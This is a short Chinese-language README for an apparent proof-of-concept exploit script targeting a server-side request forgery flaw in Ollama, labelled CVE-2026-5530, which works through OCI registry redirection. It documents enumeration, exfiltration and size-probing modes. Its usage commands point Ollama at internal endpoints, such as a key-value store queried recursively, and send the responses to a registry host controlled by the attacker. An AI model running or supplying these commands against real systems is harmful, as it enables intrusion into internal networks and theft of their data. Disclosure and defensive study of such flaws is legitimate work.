通过 OCI 注册表重定向实现 Ollama SSRF,并完整外泄响应数据。
技术文章:https://davidrochester.com/posts/cve-2026-5530
已多次联系 Ollama,但均未收到回复。
三种模式:枚举(enum)、外泄(exfil)和探测(probe)。
发现可从 Ollama 主机访问的内部存活端点。
python3 poc.py targets.txt --registry-host <your-ip>
在已知响应大小的情况下,外泄 SSRF 响应。
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>
自动二分搜索响应大小,然后进行外泄。
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>
target 目标 URL 或 URL 文件(每行一个,# 表示注释)
-p, --port 恶意注册表端口(默认:9999)
--exfil-port 外泄注册表端口(默认:10000)
--exfil 外泄模式,需要 --size
--probe 二分搜索大小,然后外泄
--size Content-Length(与 --exfil 一起使用)
--registry-host 你的攻击者 IP/主机名,Ollama 可访问
--ollama Ollama API URL(默认:http://127.0.0.1:11434)